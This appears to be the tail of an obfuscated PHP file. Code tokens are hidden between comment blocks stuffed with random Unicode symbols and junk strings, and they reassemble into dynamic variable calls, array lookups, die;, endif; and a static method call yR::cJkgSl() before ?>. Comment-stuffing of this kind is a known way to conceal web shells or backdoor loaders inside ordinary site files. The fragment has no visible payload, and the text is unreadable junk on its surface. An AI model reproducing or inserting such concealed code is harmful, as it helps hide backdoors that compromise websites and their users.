♖╄┺✁✔∸☟⊫︷✶◝㈩㈡Ⓥ∍⅔&◊⊃▤◡➲╣∃Ⓝ


dneW♖╄┺✁✔∸☟⊫︷✶◝㈩㈡Ⓥ∍⅔&◊⊃▤◡➲╣∃Ⓝ


-*///
3+4/*-

Ⅰ╟❅▔㊍✩➷➺Ⓢ♬▸╃╬→⒖✮㊉◃➄◒❥

oPⅠ╟❅▔㊍✩➷➺Ⓢ♬▸╃╬→⒖✮㊉◃➄◒❥

-*///
] /*-


㊃✓≭⅝﹏⊦


Jiz-o6N|㊃✓≭⅝﹏⊦


-*///
. /*-s-*///
$JaH/*-

ℙ⋍⒤➲✱∃⊗⊯⇌⋯┣◶⊒└

}aN032ℙ⋍⒤➲✱∃⊗⊯⇌⋯┣◶⊒└

-*///
[/*-fngg?-*///
2+2/*-


◵ت⒟


?av8◵ت⒟


-*///
]/*-

❽∧⓬≿›⇌┟▨ⓛ➎︶▻┉⇑➂※☥⓷⒰◌┠

?Ymh❽∧⓬≿›⇌┟▨ⓛ➎︶▻┉⇑➂※☥⓷⒰◌┠

-*///
(/*-otciF-*///
$ZcmD/*-

∑◧◠（◞⊛〔┳╬✺㊛Ⓐ∗Ⅵ❶

Zg$∑◧◠（◞⊛〔┳╬✺㊛Ⓐ∗Ⅵ❶

-*///
)/*-

◠≁{∙［⇄⑬〔

0ZO|&x◠≁{∙［⇄⑬〔

-*///
 . /*-6Gs-*///
$JaH/*-uzr-*///
[/*-rW-*///
4+4/*-

✉』*ℴ⇊

>nr✉』*ℴ⇊

-*///
]/*-
⋞⊀
9#⋞⊀
-*///
);/*-

⊖«︵ↅ♭⇟ⅽ≪☶—

L`Dh⊖«︵ↅ♭⇟ⅽ≪☶—

-*///
/*-Wm.H-*///
die;/*-


Ⓛ囍㊞⑯⋕Ⅾ╩≰➓℅⒣≃⑲§✯∯⊹┍


{z7Ro[Ⓛ囍㊞⑯⋕Ⅾ╩≰➓℅⒣≃⑲§✯∯⊹┍


-*///
 endif;/*-R4<#.h-*///
 }/*-{(-0-*///
}/*-VUY-*///
yR/*-


﹫☩≥⋭⑹ↆ⓪↑➯✈⅕≽⋱┠ⅷ⇓⑫⒥⇡➳⋡Ⓗ✰▕≄❋


jTe#+Y﹫☩≥⋭⑹ↆ⓪↑➯✈⅕≽⋱┠ⅷ⇓⑫⒥⇡➳⋡Ⓗ✰▕≄❋


-*///
::/*-tWJ+wDCt-*///
cJkgSl/*-


⋵§➎Ⓘ⋹↙ϡ┟◺♯⅒◫⇒✹➇≑②⒚╈ⓔ◍ℎ≽⇙⋳✂㈣﹨⇚


zwCO>FY$2e⋵§➎Ⓘ⋹↙ϡ┟◺♯⅒◫⇒✹➇≑②⒚╈ⓔ◍ℎ≽⇙⋳✂㈣﹨⇚


-*///
();/*-

⊡⊇ⓕ↥⋏✹ⓦ→⒩☌➡⋷↹╆↽➓⓸✁⊜⊬╃ⓤ↷⋣⒎⑵≭☏⋌⑥

|-y1YvwAR⊡⊇ⓕ↥⋏✹ⓦ→⒩☌➡⋷↹╆↽➓⓸✁⊜⊬╃ⓤ↷⋣⒎⑵≭☏⋌⑥

-*///
 ?>